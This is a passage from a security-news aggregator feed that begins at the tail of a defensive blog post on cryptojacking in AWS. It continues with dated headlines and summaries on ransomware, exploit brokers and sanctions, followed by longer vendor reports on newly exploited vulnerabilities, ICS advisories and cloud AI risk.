Because it’s the perfect scam:
✅ Zero investment → No hardware costs, no electricity bills, no personal risk. (Told you, the laziest attack..)
✅ Guaranteed profit → Your cloud infrastructure becomes their cash factory.
✅ Maximum stealth → Miners run silently in the background, undetected for weeks.
With skyrocketing electricity costs and the increasing difficulty of traditional mining, cryptojacking has become a highly profitable business.
🚨 The Hidden Costs to You and Your Business 💸
➞ For You, the AWS Customer:
Skyrocketing AWS bills (up to $50,000+ in a few days).
Slower applications or random crashes affecting your services.
Increased attack surface, opening doors for more security breaches.
➞ For Your Business:
Significant financial losses due to unauthorized compute usage.
Legal & compliance risks, especially if sensitive data is compromised.
Wasted resources on incident response and mitigation.
⚖️ The Legal Risks You Can’t Ignore:
Regulations like GDPR (EU) and CCPA (California) enforce strict compliance rules. If your AWS infrastructure is compromised, you could face severe consequences:
➤ Mandatory breach notification (72 hours under GDPR).
➤ Your company is liable, even if an external attack caused the breach.
➤ Fines up to 4% of global revenue or €20M (whichever is higher).
➤ You must prove that proper security measures were in place.
💬 “Cryptojacking is often seen as simple resource theft, but it frequently leads to serious data breaches.”
🔎 How to Detect a Cryptojacking Attack?
Look for these key warning signs in your AWS environment:
➩ 📊 Unusual CPU/GPU consumption (spikes in compute usage).
➩ 💰 Unexplained AWS bill increase (sudden cost surges).
➩ 🔍 Suspicious connections to your cloud resources.
➩ 🌐 Outbound traffic to known mining pools.
➩ 🛠️ Use AWS security tools (CloudTrail, GuardDuty, SIEM logs).
➩ 🍯 Deploy honeypots to trap and analyze attackers before they cause damage. (KTH Research Paper)
🌍 Monitor for Mining Pool Connections
☞ As you know by now, cryptojackers hijack computing power to mine cryptocurrency, often relying on mining pools — platforms where miners collaborate and share rewards.
☞ Monitoring these connections can help you detect unauthorized mining activity.
⛏️ Common mining pool domains to watch out for: nanopool.org, nicehash.com, supportxmr.com, hashvault.pro, zpool.ca, herominers.com, f2pool.com, minexmr.com, moneroocean.stream, miner.rocks
➥️ Source: Microsoft Security Blog, 2023
🛠️ AWS Tools to Detect Cryptojacking
Now that you understand the threat, it’s time to secure your AWS environment… 🚀
🛡️ How to Protect Your AWS Account from Cryptojacking
🔐 Best practices to strengthen your cloud security:
You should be good to go now!
📌 Reference: MITRE ATT&CK, Oct 2024
🚨 But.. Kenza, what should I do if my AWS Account is compromised?
➞ Revoke compromised IAM keys & tokens to block attacker access.
➞ Stop all suspicious instances immediately.
➞ Analyze CloudTrail logs to track the attack’s origin.
➞ Rotate all exposed credentials and review IAM permissions.
➞ Contact AWS Support → They can help mitigate financial impact.
⚠️ Every second counts! The faster you respond, the lower the cost. ⚠️
🔮 Future of Cryptojacking: Emerging Trends
Threat actors are constantly evolving. Here’s what’s coming next:
🧠 AI-powered cryptojacking:
Uses AI to optimize mining operations while avoiding detection.
Dynamically alters malware signatures to bypass security tools.
➡️ Source: Datagroup, 2024
📋 Ultimate Anti-Cryptojacking Checklist
Last table.. I promise.
🎯 Final Thoughts: Secure Your Cloud Before Malicious People Turn It into a Gold Mine!
Cryptojacking is getting more sophisticated — but with the right security measures, you can fight back.
🛡️ It’s an invisible heist. Only a well-locked system can protect you.
So… are you ready to secure your AWS infrastructure? 🚀
Thanks for taking the time to read! Looking forward to reading your feedback as always!
My Networks: 💬 LinkedIn — Let’s Connect! 👾 Discord 🧪 GitHub — AWS Security Projects straight from 2065.
"💰Cryptojacking: When Hackers Hijack Your Cloud to Mine Money🏴☠️" was originally published in InfoSec Write-ups on Medium.
by InfoSec Write-ups
2025-03-23 02:55:55
LFI Advanced Methodology by Abhijeet📝Free Article LinkContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-03-23 02:53:59
CVE-2025-21293 Alert: Active Directory Privilege Escalation Exploit Goes PublicA new Active Directory vulnerability is making waves in the cybersecurity world! Following the discovery of the zero-click OLE…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-03-23 02:53:27
HackTheBox — Origins Sherlock WalkthroughHello, my digital adventurers! Today, I will be sharing my write-up for the HackTheBox Sherlock challenge, “Origins”.Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-03-22 23:57:34
How Cybercriminals Exploit Notification ChannelsCybercriminals are always looking for new ways to take advantage of people. One effective method they use is…
by Hackread
2025-03-22 23:24:32
How Counterfeiters Use Technology to Fake Product Labels (and Strategies to Combat Fraud)Counterfeit products are a growing problem in today’s market. With advancements in technology, counterfeiters have become more skilled…
by Hackread
2025-03-22 17:27:32
U.S. Treasury removed sanctions against the crypto mixer service Tornado CashThe U.S. Treasury is lifting sanctions on Tornado Cash, a crypto mixer accused of helping North Korea’s Lazarus Group launder illicit funds. The U.S. Treasury Department removed sanctions against the cryptocurrency mixer service Tornado Cash. In August 2022, the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned the crypto mixer service Tornado Cash used by […]
by Security Affairs
2025-03-22 13:02:00
U.S. Treasury Lifts Tornado Cash Sanctions Amid North Korea Money Laundering ProbeThe U.S. Treasury Department has announced that it's removing sanctions against Tornado Cash, a cryptocurrency mixer service that has been accused of aiding the North Korea-linked Lazarus Group to launder their ill-gotten proceeds. "Based on the Administration's review of the novel legal and policy issues raised by use of financial sanctions against financial and commercial activity occurring
by The Hacker News
2025-03-22 11:35:46
Cloudflare now blocks all unencrypted traffic to its API endpointsCloudflare announced that it closed all HTTP connections and it is now accepting only secure, HTTPS connections for api.cloudflare.com. [...]
by BleepingComputer
2025-03-22 10:30:04
Microsoft Trusted Signing service abused to code-sign malwareCybercriminals are abusing Microsoft's Trusted Signing platform to code-sign malware executables with short-lived three-day certificates. [...]
by BleepingComputer
2025-03-22 00:37:09
Zero-day broker Operation Zero offers up to $4 million for Telegram exploitsRussian zero-day broker Operation Zero is looking for exploits for the popular messaging app Telegram, offering up to $4 million for them. Operation Zero, a Russian zero-day broker, is offering up to $4 million for Telegram exploits, the news was first reported by Tech Crunch. The Russian firm seeks up to $500K for one-click RCE, […]
by Security Affairs
2025-03-22 00:00:00
[webapps] TeamPass 3.0.0.21 - SQL Injection
by Exploit DB
2025-03-22 00:00:00
[remote] Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
by Exploit DB
2025-03-22 00:00:00
[remote] Microsoft Windows - NTLM Hash Leak Malicious Windows Theme
by Exploit DB
2025-03-21 21:45:18
Top threats of the 2024 botnet landscapeBotnets are becoming more sophisticated and accessible. DDoS attacks, cryptocurrency mining and data theft are just a few examples of botnet capabilities.
by Barracuda
2025-03-21 20:42:20
What CISA's Red Team Disarray Means for US Cyber DefensesDOGE is making unexpected moves at CISA, including rehiring fired probationary employees only to put them on paid leave, and reportedly gutting the agency's red teams.
by Dark Reading
2025-03-21 20:23:26
Attackers Pivot to SEMrush Spoof to Steal Google CredentialsThe attackers are taking an indirect approach to targeting SEO professionals and their Google credentials, using a fake digital marketing website.
by Dark Reading
2025-03-21 20:18:05
Nation-State 'Paragon' Spyware Infections Target Civil SocietyLaw enforcement entities in democratic states have been deploying top-of-the-line messaging app spyware against journalists and aid workers.
by Dark Reading
2025-03-21 19:58:54
Valve removes video game listing suspected of being malwareValve removed a video game called Sniper: Phantom's Resolution from Steam after users reported that its free demo contained malware.
by TechCrunch
2025-03-21 19:24:00
UAT-5918 Targets Taiwan's Critical Infrastructure Using Web Shells and Open-Source ToolsThreat hunters have uncovered a new threat actor named UAT-5918 that has been attacking critical infrastructure entities in Taiwan since at least 2023. "UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim
by The Hacker News
2025-03-21 19:12:04
Arrests in Tap-to-Pay Scheme Powered by PhishingAuthorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets being used by the scammers were created through online phishing scams, and that the accused were relying on a custom Android app to relay tap-to-pay transactions from mobile devices located in China.
by Krebs on Security
2025-03-21 18:28:00
Medusa Ransomware Uses Malicious Driver to Disable Anti-Malware with Stolen CertificatesThe threat actors behind the Medusa ransomware-as-a-service (RaaS) operation have been observed using a malicious driver dubbed ABYSSWORKER as part of a bring your own vulnerable driver (BYOVD) attack designed to disable anti-malware tools. Elastic Security Labs said it observed a Medusa ransomware attack that delivered the encryptor by means of a loader packed using a packer-as-a-service (PaaS
by The Hacker News
2025-03-21 17:58:00
These phishing attacks are now targeting Mac browsers - how to protect yourselfAfter Windows defenses improved, the attackers switched to targeting Mac and Safari users with these very effective scams.
by ZDNET Security
2025-03-21 17:57:48
It's time to update Chrome ASAP - again! - to fix this critical flawThe latest version patches a critical security flaw that could allow a web page to run malicious code in the browser.
by ZDNET Security
2025-03-21 17:39:01
Personal data revealed in released JFK filesThe release of the JFK assassination records also resulted in the leak of hundreds of Social Security Numbers
by Malwarebytes Labs
2025-03-21 16:31:00
China-Linked APT Aquatic Panda: 10-Month Campaign, 7 Global Targets, 5 Malware FamiliesThe China-linked advanced persistent threat (APT) group known as Aquatic Panda has been linked to a "global espionage campaign" that took place in 2022 targeting seven organizations. These entities include governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States. The activity, which took place
by The Hacker News
2025-03-21 16:31:00
10 Critical Network Pentest Findings IT Teams OverlookAfter conducting over 10,000 automated internal network penetration tests last year, vPenTest has uncovered a troubling reality that many businesses still have critical security gaps that attackers can easily exploit. Organizations often assume that firewalls, endpoint protection, and SIEMs are enough to keep them secure. But how effective are these defenses when put to the test? That’s where
by The Hacker News
2025-03-21 16:22:39
Signal Threatens to Leave France Over Proposed Encryption Backdoor LawUpdate: Following the publication of this article, we were informed that the French parliament voted against the controversial bill, so the threat to people's privacy has been negated, for now. However, it is often the case that governments retract law proposals when those are met with fierce resistance from the public only to reintroduce them … The post Signal Threatens to Leave France Over Proposed Encryption Backdoor Law appeared first on CyberInsider.
by Cyber Insider
2025-03-21 16:10:23
Internal vs. External Penetration Testing: What You Need to KnowInternal and external penetration testing are critical components of a holistic security testing program. Learn the differences and use cases of each type. The post Internal vs. External Penetration Testing: What You Need to Know appeared first on NetSPI.
by NetSPI
2025-03-21 16:10:14
Russian Zero-Day Firm Offers Record $4 Million for Telegram ExploitsA Russian exploit broker is offering up to $4 million for zero-day vulnerabilities targeting Telegram, underscoring the growing value of messaging app exploits amid rising demand for covert surveillance capabilities. Operation Zero, a zero-day acquisition company based in Saint Petersburg, posted the bounty this week, publicly seeking remote code execution (RCE) vulnerabilities for Telegram on … The post Russian Zero-Day Firm Offers Record $4 Million for Telegram Exploits appeared first on CyberInsider.
by Cyber Insider
2025-03-21 16:00:10
53% of security teams lack continuous and up-to-date visibilityEnterprises lack visibility into their own data, creating security risks that are compounding as organizations and their employees increase AI adoption, according to Bedrock Security. The majority of organizations struggle to track sensitive information across sprawling cloud environments, leaving them vulnerable to data breaches and compliance failures. The research also documents a significant shift in security roles, with nine in 10 professionals surveyed reporting their responsibilities have evolved in the past year, most notably in … More → The post 53% of security teams lack continuous and up-to-date visibility appeared first on Help Net Security.
by Help Net Security
2025-03-21 15:58:00
Kaspersky Links Head Mare to Twelve, Targeting Russian Entities via Shared C2 ServersTwo known threat activity clusters codenamed Head Mare and Twelve have likely joined forces to target Russian entities, new findings from Kaspersky reveal. "Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents," the company said. "This suggests
by The Hacker News
2025-03-21 14:50:00
Google Maps yanks over 10,000 fake business listings - how to spot the scamThe fake listings were part of a scam that used the old bait-and-switch tactic to prey on people - and there may be more lurking out there.
by ZDNET Security
2025-03-21 14:46:44
Why Password Security Matters: The Danish and Swedish Password ProblemIn today’s world, cybersecurity is more critical than ever. Organizations and individuals alike face a constant barrage of cyber threats, and often, the weakest link in our defenses is something as simple as a password.
by KnowBe4
2025-03-21 14:46:15
Hundreds of Malicious Android Apps Received 60 Million DownloadsBitdefender warns that a major ad fraud campaign in the Google Play Store resulted in more than 60 million downloads of malicious apps.
by KnowBe4
2025-03-21 14:11:00
Ransomware group Mora_001 targets Fortinet applicationsThe new gang appears to have links to the defunct LockBit group.
by ThreatDown
2025-03-21 14:00:00
Why Cyber Quality Is the Key to SecurityThe time to secure foundations, empower teams, and make cyber resilience the standard is now — because the cost of waiting is far greater than the investment in proactive security.
by Dark Reading
2025-03-21 13:17:03
Ex-Michigan Football Coach Indicted for Hacking Databases of 150,000 Students
A former University of Michigan football coach has been indicted for carrying out a nearly decade-long hacking campaign targeting over 100 U.S. colleges and universities, compromising sensitive medical records and personal accounts of more than 150,000 student athletes. The scheme, allegedly orchestrated by 42-year-old Matthew Weiss, involved unauthorized access to databases maintained by a third-party …
by Cyber Insider
2025-03-21 13:10:00
Detecting sensitive data and misconfigurations in AWS and GCP with Cloudflare One
Using Cloudflare’s CASB, integrate, scan, and detect sensitive data and misconfigurations in your cloud storage accounts.
by Cloudflare
2025-03-21 13:05:00
Russian zero-day seller is offering up to $4 million for Telegram exploits
Two sources in the zero-day industry say Operation Zero’s prices for exploits against the popular messaging app Telegram will depend on different factors.
by TechCrunch
2025-03-21 13:00:16
More From Our Main Blog: The Good, the Bad and the Ugly in Cybersecurity – Week 12
Three new bugs added to CISA’s KEV catalog, RaaS affiliates use new custom backdoor, and compromised GitHub Action exposes CI/CD secrets.
by SentinelOne
2025-03-21 13:00:00
RDP without the risk: Cloudflare's browser-based solution for secure third-party access
Cloudflare now provides clientless, browser-based support for the Remote Desktop Protocol (RDP). It enables secure, remote Windows server access without VPNs or RDP clients.
by Cloudflare
2025-03-21 13:00:00
Enhance data protection in Microsoft Outlook with Cloudflare One’s new DLP Assist
Customers can now easily safeguard sensitive data in Microsoft Outlook with our new DLP Assist feature.
by Cloudflare
2025-03-21 13:00:00
Prepping for post-quantum: a beginner’s guide to lattice cryptography
This post is a beginner’s guide to lattices, the math at the heart of the transition to post-quantum (PQ) cryptography. It explains how to do lattice-based encryption and authentication from scratch.
by Cloudflare
2025-03-21 13:00:00
Improving Data Loss Prevention accuracy with AI-powered context analysis
Cloudflare’s Data Loss Prevention is reducing false positives by using a self-improving AI-powered algorithm, built on Cloudflare’s Developer Platform.
by Cloudflare
2025-03-21 13:00:00
Cloudflare is now IRAP assessed at the PROTECTED level, furthering our commitment to the global public sector
Cloudflare is now assessed at the IRAP PROTECTED level, bringing our products and services to the Australian Public Sector.
by Cloudflare
2025-03-21 12:25:41
IT Consolidation on the Rise: Where to Start, What to Keep
As IT teams grapple with app sprawl and inefficiencies, organizations are prioritizing IT consolidation to cut costs, improve productivity, and streamline operations.
by ITPro Today
2025-03-21 11:58:50
One-third of CNI organisations admit to paying ransomware according to new report from Bridewell
According to new research entitled Cyber Security in Critical National Infrastructure: 2025, from Bridewell, a leading UK-based cyber security services provider, one-third of UK CNI organisations targeted by ransomware admitted to paying the ransom – a practice which has been hotly debated in recent times. Furthermore, a staggering 95% of UK Critical National Infrastructure (CNI) […]
by IT Security Guru
2025-03-21 11:37:00
Coinbase originally targeted during GitHub Action supply chain attack
Researchers from Palo Alto Networks said the hackers likely planned to leverage an open source project of the company for additional attacks.
by Cybersecurity Dive
2025-03-21 11:10:00
Medusa ransomware using malicious driver as EDR killer
"ABYSSWORKER" imitates a CrowdStrike Falcon driver.
by Cybersecurity Dive
2025-03-21 11:00:00
How To Create a Tabbed GUI in PowerShell
This PowerShell tutorial explains how to build a simple tabbed GUI using a Windows Form and a TabControl. Each tab is created using TabPage objects.
by ITPro Today
2025-03-21 10:43:27
Steam Removes “Sniper: Phantom’s Resolution” After Users Find Malware in Demo
Valve has delisted a suspicious game from the Steam platform after community-led investigations revealed its downloadable demo was, in fact, a malware-laced executable hosted outside the Steam ecosystem. The game, titled Sniper: Phantom’s Resolution, first drew suspicion when users noticed promotional material on its Steam page appeared to be lifted from unrelated titles. Reddit users …
by Cyber Insider
2025-03-21 10:39:00
Ongoing Cyber Attacks Exploit Critical Vulnerabilities in Cisco Smart Licensing Utility
Two now-patched security flaws impacting Cisco Smart Licensing Utility are seeing active exploitation attempts, according to SANS Internet Storm Center. The two critical-rated vulnerabilities in question are listed below - CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an
by The Hacker News
2025-03-21 10:36:30
Underground Market Exploits and Active Threats: Key Takeaways from the Weekly Vulnerability Insights Report

Overview

The weekly vulnerability insights report to clients sheds light on the most pressing cybersecurity vulnerabilities that have been identified and exploited. This weekly vulnerability insights report highlights the continuous efforts of organizations to protect their systems and networks from cyber threats, focusing on critical vulnerabilities that demand immediate attention from security professionals. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerability (KEV) catalog to include multiple high-severity flaws that are actively being targeted by attackers.

During the week of March 12, 2025, CISA added several vulnerabilities to its KEV catalog, reflecting growing concerns about active exploitation. Among these, CVE-2025-30066 stood out as a severe threat, involving an authentication bypass vulnerability in the tj-actions/changed-files GitHub Action. This flaw allows attackers to execute arbitrary code on affected systems by exploiting improper validation in the GitHub Action. The high-severity flaw has been flagged for urgent attention, though, as of the report’s publication, no proof-of-concept (PoC) or exploit has been observed in the wild.

Alongside CVE-2025-30066, CVE-2025-24472 in Fortinet’s FortiOS and FortiProxy products also made its way into the catalog. This authentication bypass vulnerability is particularly alarming as it permits attackers to gain super-admin privileges remotely, bypassing standard authentication mechanisms. With a CVSSv3 score of 8.1, it poses security risks to affected networks. Additionally, CVE-2025-21590 in Juniper’s Junos OS was listed, a vulnerability related to improper isolation that can lead to unintended access and data exposure.

Notable Vulnerabilities Identified in the Weekly Vulnerability Insights Report

CRIL’s analysis delved deeper into several key vulnerabilities during the week, shedding light on their exploitation potential. Among the vulnerabilities investigated, CVE-2024-54085, an authentication bypass in AMI’s MegaRAC BMC, was identified as critical. This vulnerability allows remote attackers to gain full control over affected servers without authentication, paving the way for potential malware deployment or even hardware damage. The risk is compounded by the lack of public internet exposure, making it difficult to defend against potential attacks that might go undetected for longer periods.

Another critical vulnerability analyzed by Cyble was CVE-2025-24813 in Apache Tomcat. This remote code execution (RCE) flaw allows attackers to exploit improper file path handling during partial PUT requests, granting unauthorized access to the affected system. The flaw was observed to be actively discussed in underground forums, with PoC code circulating widely. As a widely used Java servlet container, Apache Tomcat’s exposure to this flaw presents a considerable risk to enterprises and their web applications.

In addition, vulnerabilities such as CVE-2025-25292 and CVE-2025-25291 in ruby-saml and CVE-2025-27363 in the FreeType library further highlight the widespread and diverse nature of vulnerabilities, ranging from authentication bypasses to out-of-bounds write issues.

Threats on Underground Forums and Markets

CRIL also reported disturbing activity in underground forums and dark web marketplaces, where threat actors discussed and offered exploits for various vulnerabilities. Notable discussions included CVE-2025-26319 and CVE-2025-26633, which involved critical arbitrary file upload vulnerabilities and improper input validation flaws, respectively. Both were being actively weaponized by attackers to infiltrate systems and gain unauthorized access.

Additionally, exploits for vulnerabilities such as CVE-2025-26776 in the Chaty Pro plugin for WordPress and CVE-2025-1128 in the Everest Forms plugin for WordPress were being advertised. These critical flaws could allow attackers to execute arbitrary actions on compromised servers, further emphasizing the growing trend of weaponizing vulnerabilities through readily available exploits in underground communities.

Further unsettling was the report of a zero-day exploit in TP-Link routers being sold for USD 1,000 on dark web forums. The exploit, which enables remote code execution (RCE), allows attackers to disable firewalls, steal credentials, and open encrypted backdoors on affected routers. Such active sales of exploits underscore the increasing commodification of zero-day vulnerabilities, making it easier for malicious actors to launch sophisticated attacks.

Vulnerabilities Under Scrutiny

Several vulnerabilities continued to attract attention during the week, with PoCs or exploits observed on various forums. These include:
- CVE-2025-26319 (FlowiseAI): A critical vulnerability in FlowiseAI v2.2.6, related to arbitrary file uploads.
- CVE-2025-24813 (Apache Tomcat): A flaw that allows remote code execution, actively discussed and exploited.
- CVE-2025-26633 (Microsoft Management Console): A high-severity issue impacting Microsoft systems.

Recommendations for Mitigating Exploitation Risks

To defend against the increasing threats posed by these vulnerabilities, organizations must adopt robust security practices. Here are several critical recommendations:
- Ensure that all systems are updated with the latest security patches from vendors. Critical patches, especially those for vulnerabilities like CVE-2025-24472 and CVE-2025-24813, should be prioritized to mitigate active exploitation risks.
- Establish a comprehensive patch management strategy that includes regular assessments, testing, deployment, and verification of updates. Automation tools can assist in streamlining the patch application process, ensuring consistency and timely implementation.
- Proper segmentation of networks can prevent attackers from moving laterally within the environment, reducing exposure to critical assets.
- Develop and continuously update incident response plans to ensure preparedness in the event of an attack. These plans should include procedures for identifying, containing, and mitigating active threats.
- Conduct VAPT exercises regularly to identify vulnerabilities before attackers can exploit them.
- Periodically conduct audits to maintain compliance with internal and external security standards.
- Invest in comprehensive monitoring tools and systems, such as SIEM platforms, to detect abnormal behaviors and potential exploitation attempts.
- Educate employees and stakeholders about the latest cybersecurity threats, including recognizing phishing attempts and malicious links that may exploit vulnerabilities such as CVE-2025-30066.

Conclusion

The vulnerabilities identified from March 12 to March 18, 2025, highlight the ongoing battle against cyber threats. Active exploitation of vulnerabilities like CVE-2025-24472 in FortiOS and CVE-2025-24813 in Apache Tomcat reinforces the importance of timely patching and vigilance. With threat actors increasingly relying on underground forums and exploit markets to spread proofs of concept and zero-day exploits, it is important for organizations to remain proactive and continually update their security measures to mitigate these cyber threats.

Adopting better security practices is crucial for protecting sensitive data and ensuring the integrity of your systems. A comprehensive threat intelligence solution like Cyble can track potential threats, vulnerabilities, and leaks specific to your environment, enabling you to take swift action before they escalate into major incidents. For full access to IT vulnerability reports and other insights from Cyble, click here.

References:
- https://nvd.nist.gov/vuln/detail/cve-2025-30066
- https://nvd.nist.gov/vuln/detail/CVE-2025-24472
- https://nvd.nist.gov/vuln/detail/CVE-2025-21590
- https://nvd.nist.gov/vuln/detail/CVE-2025-26319
- https://nvd.nist.gov/vuln/detail/CVE-2025-24813
- https://nvd.nist.gov/vuln/detail/CVE-2025-26633
by CYBLE
2025-03-21 10:33:03
Why Breach and Attack Simulation (BAS) Solutions Are The Safest Way for Security Validation?
Breach and Attack Simulation (BAS) is the safest and most effective way to validate an organization’s security posture. Unlike traditional methods such as manual penetration testing, automated red teaming, or vulnerability scanning, BAS provides continuous, controlled, and risk-free assessments without exposing systems to real threats. It eliminates the risks of invasive testing, human error, and limited coverage, ensuring real-time security validation without operational impact.
by Picus Security
2025-03-21 10:30:00
How to Avoid US-Based Digital Services—and Why You Might Want To
Amid growing concerns over Big Tech firms aligning with Trump administration policies, people are starting to move their digital lives to services based overseas. Here’s what you need to know.
by WIRED Security News
2025-03-21 10:28:24
Fog ransomware publishes victim’s IP | Kaspersky official blog
Cybercriminals behind the Fog ransomware publish leaked data along with the IP addresses of attacked computers.
by Kaspersky
2025-03-21 10:12:55
ICS Vulnerability Report: Solar Energy, Cardiology Fixes Urged by Cyble

Overview

Cyble’s weekly industrial control system (ICS) vulnerability report to clients examined 66 ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities found in 18 recent advisories from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The 66 vulnerabilities include 30 high-severity flaws and 15 critical vulnerabilities across eight sectors, ranging from energy and healthcare to transportation, critical manufacturing, chemical, food and agriculture, wastewater, and commercial facilities. Cyble highlighted two of the CISA advisories as meriting particularly high attention because of vulnerabilities found in solar energy management and cardiology diagnostic systems.

Critical ICS Vulnerabilities

Cyble noted that vulnerabilities within Sungrow iSolarCloud “are among the important ones as they impact critical energy management systems.” Sungrow’s iSolarCloud Android App and WiNet firmware are critical for monitoring and controlling solar energy infrastructure, enabling users to optimize performance and ensure seamless operations. Eight critical vulnerabilities in particular pose significant risks to the energy sector, as successful exploitation could result in attackers accessing and modifying sensitive information. The vulnerabilities include eight flaws rated between CVSS v4 9.2 and 9.5. Those include:
- CVE-2024-50693 and CVE-2024-50689: both 9.2-rated Authorization Bypass Through User-Controlled Key vulnerabilities
- CVE-2024-50692: a 9.5-severity Use of Hard-Coded Credentials vulnerability
- CVE-2024-50694, CVE-2024-50695 and CVE-2024-50697: 9.5-severity Stack-Based Buffer Overflow vulnerabilities
- CVE-2024-50698: a 9.5-rated Heap-Based Buffer Overflow vulnerability
- CVE-2024-50696: a 9.5-rated Download of Code Without Integrity Check vulnerability

Sungrow has released updated versions of the affected firmware. Users are urged to apply version WINET-SV200.001.00.P028 or higher and update their iSolarCloud Android App to the latest version. The iSolarCloud has been updated and requires no further user action.

A second CISA advisory flagged by Cyble involves two 8.5-severity vulnerabilities affecting older versions of Philips IntelliSpace Cardiovascular (ISCV), a critical platform for managing and analyzing cardiovascular imaging data that assists clinicians in diagnosing and treating heart conditions. An Improper Authentication vulnerability (CVE-2025-2230) could allow unauthorized users to access sensitive patient data, compromising the confidentiality and integrity of medical records. Additionally, the use of Weak Credentials (CVE-2025-2229) makes the system more susceptible to brute-force attacks and credential exploitation. “These weaknesses not only endanger patient privacy but also disrupt critical diagnostic workflows, potentially impacting patient care,” Cyble said in its report to clients. CISA noted that successfully exploiting the vulnerabilities “could allow an attacker to replay the session of the logged-in ISCV user and gain access to patient records.”

While the ISCV vulnerability findings are new, they were fixed some time ago but may still be present in older systems. CVE-2025-2229 was resolved in ISCV 4.2 build 20589, released in May 2019, and CVE-2025-2230 was resolved in ISCV 5.2, which was released in September 2020.

Recommendations for Mitigating ICS Vulnerabilities

Cyble recommends the following controls for mitigating ICS vulnerabilities and improving the overall security of ICS systems. These measures include:
- Staying on top of security advisories and patch alerts issued by vendors and regulatory bodies like CISA. A risk-based approach to vulnerability management reduces the risk of exploitation.
- Implementing a Zero-Trust Policy to minimize exposure and ensure that all internal and external network traffic is scrutinized and validated.
- Developing a comprehensive patch management strategy that covers inventory management, patch assessment, testing, deployment, and verification. Automating these processes can help maintain consistency and improve efficiency.
- Network segmentation can limit an attacker’s potential damage and prevent lateral movement across networks. This is particularly important for securing critical ICS assets, which should not be exposed to the Internet if possible and protected adequately if remote access is essential.
- Conducting regular vulnerability assessments and penetration testing to identify security gaps that might be exploited by threat actors.
- Establishing and maintaining an incident response plan and ensuring that it is tested and updated regularly to adapt to the latest threats.
- All employees, especially those working with Operational Technology (OT) systems, should be required to undergo ongoing cybersecurity training programs. The training should focus on recognizing phishing attempts, following authentication procedures, and understanding the importance of cybersecurity practices in day-to-day operations.

Conclusion

These vulnerabilities highlight the dangers that critical infrastructure system vulnerabilities can pose to critical sectors like energy, healthcare, and other sensitive environments. Users should heed the advice of CISA, vendors, and security researchers and ensure that these critical systems are patched and properly protected. Regardless of the sector, staying on top of ICS vulnerabilities and applying good cybersecurity hygiene and controls can limit risk. This includes limiting internet exposure and properly protecting assets that must be accessed remotely. To access the full report on ICS vulnerabilities observed by Cyble, along with additional insights and details, click here.

By adopting a comprehensive, multi-layered security approach that includes effective vulnerability management, timely patching, and ongoing employee training, organizations can reduce their exposure to cyber threats. With the right tools and intelligence, such as those offered by Cyble, critical infrastructure can be better protected, ensuring its resilience and security in an increasingly complex cyber landscape.
by CYBLE
2025-03-21 10:00:29
Threat landscape for industrial automation systems in Q4 2024
The report contains statistics on malware, initial infection vectors and other threats to industrial automation systems in Q4 2024.
by Securelist
2025-03-21 09:07:21
Cyberhaven Supply Chain Attack: Exploiting Browser Extensions
In late 2024, Darktrace detected unusual activity linked to Cyberhaven’s Chrome browser extension. Read more about Darktrace’s investigation here.
by Darktrace
2025-03-21 09:00:00
Cybersecurity Snapshot: Tenable Highlights Risks of AI Use in the Cloud, as UK’s NCSC Offers Tips for Post-Quantum Cryptography Adoption

Check out key findings and insights from the “Tenable Cloud AI Risk Report 2025.” Plus, get fresh guidance on how to transition to quantum-resistant cryptography. In addition, find out how AI is radically transforming cyber crime. And get the latest on open source software security; cyber scams; and IoT security.

Dive into six things that are top of mind for the week ending March 21.

1 - Tenable: Orgs using AI in the cloud face thorny cyber risks

Using AI tools in cloud environments? Make sure your organization is aware of and prepared for the complex cybersecurity risks that emerge when you mix AI and the cloud.

That’s a key message from the “Tenable Cloud AI Risk Report 2025,” released this week and based on a telemetry analysis of public cloud and enterprise workloads scanned through Tenable products.

“Cloud security measures must evolve to meet the new challenges of AI and find the delicate balance between protecting against complex attacks on AI data and enabling organizations to achieve responsible AI innovation,” Liat Hayun, Tenable’s VP of Research and Product Management for Cloud Security, said in a statement.

Key findings from the report include:
- 70% of cloud workloads with AI software installed have at least one critical vulnerability, compared with 50% of cloud workloads that don’t have AI software installed.
- 77% of organizations have the overprivileged default Compute Engine service account configured in Google Vertex AI Notebooks – which puts all services built on this default Compute Engine at risk.
- 91% of organizations using Amazon Sagemaker have the risky default of root access in at least one notebook instance, which could grant attackers unauthorized access if compromised.

These are some of the report’s risk mitigation recommendations:
- Take a contextual approach for revealing exposures across your cloud infrastructure, identities, data, workloads and AI tools.
- Classify all AI components linked to business-critical assets as sensitive, and include AI tools and data in your asset inventory, scanning them continuously.
- Keep current on emerging AI regulations and guidelines, and stay compliant by mapping key cloud-based AI data stores and implementing required access controls.
- Apply cloud providers’ recommendations for their AI services, but be aware that default settings are commonly insecure and guidance is still evolving.
- Prevent unauthorized or overprivileged access to cloud-based AI models and data stores.
- Prioritize vulnerability remediation by understanding which CVEs pose the greatest risk to your organization.

To get more information, check out:
- The full “Tenable Cloud AI Risk Report 2025”
- The webinar “2025 Cloud AI Risk Report: Helping You Build More Secure AI Models in the Cloud” on April 17, 2025 at 2 pm EDT
- The video “Why firms need ‘exposure management’ for cloud security”

2 - U.K.’s cyber agency offers post-quantum migration guidance

Is your organization planning to adopt cryptography that can resist attacks from future quantum computers? If so, you might want to check out fresh guidance about this topic.

This week, the U.K. National Cyber Security Centre (NCSC) published “Timelines for migration to post-quantum (PQC) cryptography,” a white paper aimed at helping organizations plan their migration to quantum-resistant cryptography.

